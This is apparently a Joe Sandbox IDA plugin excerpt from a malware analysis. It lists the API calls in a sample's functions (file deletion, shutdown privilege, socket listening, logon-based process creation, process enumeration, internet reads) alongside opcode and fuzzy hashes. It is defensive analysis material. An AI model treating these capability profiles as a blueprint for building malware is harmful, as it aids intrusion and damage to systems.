                                                  • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                  • String ID: *.*
                                                  • API String ID: 713712311-438819550
                                                  • Opcode ID: 51f4eeec3ad41171c5791ce3b71bb45854c28a6dcea91fc91831d7d0ba91249f
                                                  • Instruction ID: 3328d79ac899ba982b8ad4f4ffe2ea03543489cf59432e062d8c602af18b387a
                                                  • Opcode Fuzzy Hash: 51f4eeec3ad41171c5791ce3b71bb45854c28a6dcea91fc91831d7d0ba91249f
                                                  • Instruction Fuzzy Hash: AC414B7194021E9BCF14EF64DC49BEEBBB4FF15310F1445BAE815A2291DB709A86CF60
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove
                                                  • String ID:
                                                  • API String ID: 4104443479-0
                                                  • Opcode ID: 374ee6cc1b426540d8f47349044112c4b88fe55a89528b4366cb153255ba4c10
                                                  • Instruction ID: b6d3a22d0852bff16fc931da0d5f6fb1851b6af9d028a17786a01916cdc79b57
                                                  • Opcode Fuzzy Hash: 374ee6cc1b426540d8f47349044112c4b88fe55a89528b4366cb153255ba4c10
                                                  • Instruction Fuzzy Hash: 8D127A70A00609DBDF14DFA5D981AEEB7F5FF48300F2045AAE806A7290EB75AD91DB50
                                                  APIs
                                                    • Part of subcall function 00BC4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BC4743,?,?,00BC37AE,?), ref: 00BC4770
                                                    • Part of subcall function 00C24A31: GetFileAttributesW.KERNEL32(?,00C2370B), ref: 00C24A32
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C23B89
                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00C23BD9
                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C23BEA
                                                  • FindClose.KERNEL32(00000000), ref: 00C23C01
                                                  • FindClose.KERNEL32(00000000), ref: 00C23C0A
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                  • String ID: \*.*
                                                  • API String ID: 2649000838-1173974218
                                                  • Opcode ID: b4ba0a5456b32f309c7fc67758f16d5b8f53dfe63a6635106bb9b4df91ffc450
                                                  • Instruction ID: 2a9ea60e800dab7ded82692d79716b5f28229669d7732da379c4b7498a24693c
                                                  • Opcode Fuzzy Hash: b4ba0a5456b32f309c7fc67758f16d5b8f53dfe63a6635106bb9b4df91ffc450
                                                  • Instruction Fuzzy Hash: B9319E310083959BC301EF24D891EAFB7E8BE96310F404E6DF4E592191EF349A09CB63
                                                  APIs
                                                    • Part of subcall function 00C187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C1882B
                                                    • Part of subcall function 00C187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C18858
                                                    • Part of subcall function 00C187E1: GetLastError.KERNEL32 ref: 00C18865
                                                  • ExitWindowsEx.USER32(?,00000000), ref: 00C251F9
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                  • String ID: $@$SeShutdownPrivilege
                                                  • API String ID: 2234035333-194228
                                                  • Opcode ID: 5c2b1bd6d501c8304a9586d803f59b544760e962d97d43d7ec003796a4231f6c
                                                  • Instruction ID: 79066dbc75239f9d822cc7dd8984fc4d1601f1dd779865e6a019cb184e3a076f
                                                  • Opcode Fuzzy Hash: 5c2b1bd6d501c8304a9586d803f59b544760e962d97d43d7ec003796a4231f6c
                                                  • Instruction Fuzzy Hash: 81012635795631ABF72C6278BC8AFBF7258EB06350F200435F927E28D2DE715D0195A0
                                                  APIs
                                                  • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00C362DC
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C362EB
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C36307
                                                  • listen.WSOCK32(00000000,00000005), ref: 00C36316
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C36330
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C36344
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketlistensocket
                                                  • String ID:
                                                  • API String ID: 1279440585-0
                                                  • Opcode ID: 0c16f1477b19bd68bf56314f7dcaa7acbab7b5a7333da1898b26c81c535c5299
                                                  • Instruction ID: 160b51c37bb21c48b4f27f31470e37c3c094eed81a245ded68bfb4c2a7be6e09
                                                  • Opcode Fuzzy Hash: 0c16f1477b19bd68bf56314f7dcaa7acbab7b5a7333da1898b26c81c535c5299
                                                  • Instruction Fuzzy Hash: FC21BB35600200AFDB10AF64C849B6EB7E9FF4A720F15816CE866A72E1CB70AD01DB51
                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00C185E2
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00C185E9
                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00C185F8
                                                  • CloseHandle.KERNEL32(00000004), ref: 00C18603
                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C18632
                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00C18646
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                  • String ID:
                                                  • API String ID: 1413079979-0
                                                  • Opcode ID: 4dfb8ebe684d9690e12389c06d6924a7a07b660c00ea7f694b6965c75b5e2151
                                                  • Instruction ID: 2498c486d4f88a367357dd56ca1783de80b9b8ee983d5fc74c7238946a9a0453
                                                  • Opcode Fuzzy Hash: 4dfb8ebe684d9690e12389c06d6924a7a07b660c00ea7f694b6965c75b5e2151
                                                  • Instruction Fuzzy Hash: 6D119D7610420DABDF128FA4DC48FDE7BA9FF4A354F044028FE04A2160C7758E65EB60
                                                  APIs
                                                    • Part of subcall function 00BE0DB6: std::exception::exception.LIBCMT ref: 00BE0DEC
                                                    • Part of subcall function 00BE0DB6: __CxxThrowException@8.LIBCMT ref: 00BE0E01
                                                  • _memmove.LIBCMT ref: 00C10258
                                                  • _memmove.LIBCMT ref: 00C1036D
                                                  • _memmove.LIBCMT ref: 00C10414
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                  • String ID:
                                                  • API String ID: 1300846289-0
                                                  • Opcode ID: debfe80ae4e16c9fef46d7130c7f91c59958fbd9ddb0f1902b74498ce245d5f1
                                                  • Instruction ID: 7ff8203a7461ebaaa9798c3477712120c74453adacc751809f112b1f61662772
                                                  • Opcode Fuzzy Hash: debfe80ae4e16c9fef46d7130c7f91c59958fbd9ddb0f1902b74498ce245d5f1
                                                  • Instruction Fuzzy Hash: EA02BE70A00209DBCF14DF65D981AAEBBF5EF45300F6480A9E80ADB355EB74DE90DB91
                                                  APIs
                                                    • Part of subcall function 00BC2612: GetWindowLongW.USER32(?,000000EB), ref: 00BC2623
                                                  • DefDlgProcW.USER32(?,?,?,?,?), ref: 00BC19FA
                                                  • GetSysColor.USER32(0000000F), ref: 00BC1A4E
                                                  • SetBkColor.GDI32(?,00000000), ref: 00BC1A61
                                                    • Part of subcall function 00BC1290: DefDlgProcW.USER32(?,00000020,?), ref: 00BC12D8
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ColorProc$LongWindow
                                                  • String ID:
                                                  • API String ID: 3744519093-0
                                                  • Opcode ID: 69f0b8f061f53329d644ee61088e800cbd5fedce438560df3861d3f3466a6341
                                                  • Instruction ID: 4958000f30b767b4e2205ae57718273c9ec6809d8563ec9dc3c38667cb2a84b8
                                                  • Opcode Fuzzy Hash: 69f0b8f061f53329d644ee61088e800cbd5fedce438560df3861d3f3466a6341
                                                  • Instruction Fuzzy Hash: 4FA15971106548BAEA28AB2D8CC4F7F35DCEF43341B14499EF613F6193CA60DD02A6B6
                                                  APIs
                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00C2BCE6
                                                  • _wcscmp.LIBCMT ref: 00C2BD16
                                                  • _wcscmp.LIBCMT ref: 00C2BD2B
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00C2BD3C
                                                  • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00C2BD6C
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Find$File_wcscmp$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 2387731787-0
                                                  • Opcode ID: 02da5029a444e45f2fde4d95bb91c7b1a11cb10c0454f550badb1feff4360cf4
                                                  • Instruction ID: c7849be68052bdb7e591a07ad286dd20cc346cc8bc52f5008bb994faca77c7df
                                                  • Opcode Fuzzy Hash: 02da5029a444e45f2fde4d95bb91c7b1a11cb10c0454f550badb1feff4360cf4
                                                  • Instruction Fuzzy Hash: 94518A356046129FD714DF28D491EAAB3E8FF4A320F10466DE966877A1DB30ED05CB91
                                                  APIs
                                                    • Part of subcall function 00C37D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00C37DB6
                                                  • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00C3679E
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C367C7
                                                  • bind.WSOCK32(00000000,?,00000010), ref: 00C36800
                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00C3680D
                                                  • closesocket.WSOCK32(00000000,00000000), ref: 00C36821
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                  • String ID:
                                                  • API String ID: 99427753-0
                                                  • Opcode ID: 9f3d7af0f437c96ed6fa061b47b2bafd287e0fc8690d7a6d333c126514b45ff0
                                                  • Instruction ID: ba738c03be59026c4c06fdcc2710383c7b40e29e074eed07f28fb4b2af1a14fc
                                                  • Opcode Fuzzy Hash: 9f3d7af0f437c96ed6fa061b47b2bafd287e0fc8690d7a6d333c126514b45ff0
                                                  • Instruction Fuzzy Hash: 5641A575A00210AFEB10BF648C86F6E77E8EF45754F4485ACF95AAB3D3CA709D018B91
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                  • String ID:
                                                  • API String ID: 292994002-0
                                                  • Opcode ID: 449601772602d0f89176d00dc7eda3009f57770bef50eecf1987714182ebe6f3
                                                  • Instruction ID: 67492577be0b1fd4a9ba208e7c660bd5b01d02b9bd89b52f709b5448118a05c3
                                                  • Opcode Fuzzy Hash: 449601772602d0f89176d00dc7eda3009f57770bef50eecf1987714182ebe6f3
                                                  • Instruction Fuzzy Hash: EA11C435700911AFEB215F269C48F6F7B99FF457A1B41402DF856D7252CBB0DD028AA4
                                                  APIs
                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00C180C0
                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00C180CA
                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00C180D9
                                                  • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00C180E0
                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00C180F6
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: HeapInformationToken$AllocErrorLastProcess
                                                  • String ID:
                                                  • API String ID: 44706859-0
                                                  • Opcode ID: 4c6c3af7f6f812b031dab592a91f6fced3ca9182b30d303f1d15e08495276c35
                                                  • Instruction ID: 95ee0b44e8888f9b8c0f89187938cda57c662d6ef0c00ae3cd638738332ef0fa
                                                  • Opcode Fuzzy Hash: 4c6c3af7f6f812b031dab592a91f6fced3ca9182b30d303f1d15e08495276c35
                                                  • Instruction Fuzzy Hash: 1AF04F35244204BFEB200FA5EC8DFAF3BACFF8B755B100029F945C6150CA61DD46EA60
                                                  APIs
                                                  • CoInitialize.OLE32(00000000), ref: 00C2C432
                                                  • CoCreateInstance.OLE32(00C52D6C,00000000,00000001,00C52BDC,?), ref: 00C2C44A
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • CoUninitialize.OLE32 ref: 00C2C6B7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                  • String ID: .lnk
                                                  • API String ID: 2683427295-24824748
                                                  • Opcode ID: 9facf1c2053f95577bc9af0af9f0bcd7503fb8841e53f2a655d026505ec24b92
                                                  • Instruction ID: efbae338384aac0738461cf8ff09e221b8a50c8cde17aa844a4b07e7875fd4b5
                                                  • Opcode Fuzzy Hash: 9facf1c2053f95577bc9af0af9f0bcd7503fb8841e53f2a655d026505ec24b92
                                                  • Instruction Fuzzy Hash: 20A15C71104205AFD700EF54C885EAFB7E8FF99354F00496CF1969B192EB71EA49CB62
                                                  APIs
                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00BC4AD0), ref: 00BC4B45
                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BC4B57
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: AddressLibraryLoadProc
                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                  • API String ID: 2574300362-192647395
                                                  • Opcode ID: eb7c3a1caecfb6e6e72d492cb6371d708ab3c66b980a695c0dbe27646fdc2e71
                                                  • Instruction ID: 4d1a0df20dd70cee7b43e65572512c2c7af18e55ed2d291a293bdf25ae636126
                                                  • Opcode Fuzzy Hash: eb7c3a1caecfb6e6e72d492cb6371d708ab3c66b980a695c0dbe27646fdc2e71
                                                  • Instruction Fuzzy Hash: 2ED017B9A10713CFD7209F32E828F4A76E4FF06391B11887E9886D6150E770E881CA58
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: __itow__swprintf
                                                  • String ID:
                                                  • API String ID: 674341424-0
                                                  • Opcode ID: a11b07c2e856ad13e9869a869bf692286da7a9e5ff9a7212b08e9ff111dc1bbe
                                                  • Instruction ID: c920978a58e10188d0af7de8650b7b7b98af9594a200f8c80f5bb65c4a07dca8
                                                  • Opcode Fuzzy Hash: a11b07c2e856ad13e9869a869bf692286da7a9e5ff9a7212b08e9ff111dc1bbe
                                                  • Instruction Fuzzy Hash: 9A2279716083019FD724DF24C891B6AF7E4AF84710F10496EF89A97392EB75EA44CB93
                                                  APIs
                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00C3EE3D
                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00C3EE4B
                                                    • Part of subcall function 00BC7DE1: _memmove.LIBCMT ref: 00BC7E22
                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00C3EF0B
                                                  • CloseHandle.KERNEL32(00000000,?,?,?), ref: 00C3EF1A
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                                  • String ID:
                                                  • API String ID: 2576544623-0
                                                  • Opcode ID: da32ccb64ed61871f72956d544c1e2ecb7b650d33524690011311ed38ce2acb4
                                                  • Instruction ID: 6adf5ad2c6bacc06454c7958a783ada94d437a29a29960222a433f0129cbfd32
                                                  • Opcode Fuzzy Hash: da32ccb64ed61871f72956d544c1e2ecb7b650d33524690011311ed38ce2acb4
                                                  • Instruction Fuzzy Hash: 0D516A71504311ABD320EF24DC85F6FBBE8EF98750F10486DF596972A1EB70A909CB92
                                                  APIs
                                                  • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00C1E628
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: lstrlen
                                                  • String ID: ($|
                                                  • API String ID: 1659193697-1631851259
                                                  • Opcode ID: 83e54e1b53e9bb9b074bd7d32ff0adf0ebe59bd5c7f21ec4cfca7f96d46d321a
                                                  • Instruction ID: ead00e9fcbf05095be165fd8af9af84e78845b7d9b5feb77bf678e7649762785
                                                  • Opcode Fuzzy Hash: 83e54e1b53e9bb9b074bd7d32ff0adf0ebe59bd5c7f21ec4cfca7f96d46d321a
                                                  • Instruction Fuzzy Hash: 1E322675A007059FDB28DF19C4819AAB7F0FF49320B15C46EE8AADB3A1D770E981DB44
                                                  APIs
                                                  • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00C3180A,00000000), ref: 00C323E1
                                                  • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00C32418
                                                  Memory Dump Source
                                                  • Source File: 00000005.00000002.1307531350.0000000000BC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00BC0000, based on PE: true
                                                  • Associated: 00000005.00000002.1307513741.0000000000BC0000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C4F000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307580161.0000000000C74000.00000002.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307628375.0000000000C7E000.00000004.00000001.01000000.00000004.sdmp
                                                  • Associated: 00000005.00000002.1307655334.0000000000C87000.00000002.00000001.01000000.00000004.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_5_2_bc0000_new.jbxd
                                                  Similarity
                                                  • API ID: Internet$AvailableDataFileQueryRead
                                                  • String ID:
                                                  • API String ID: 599397726-0
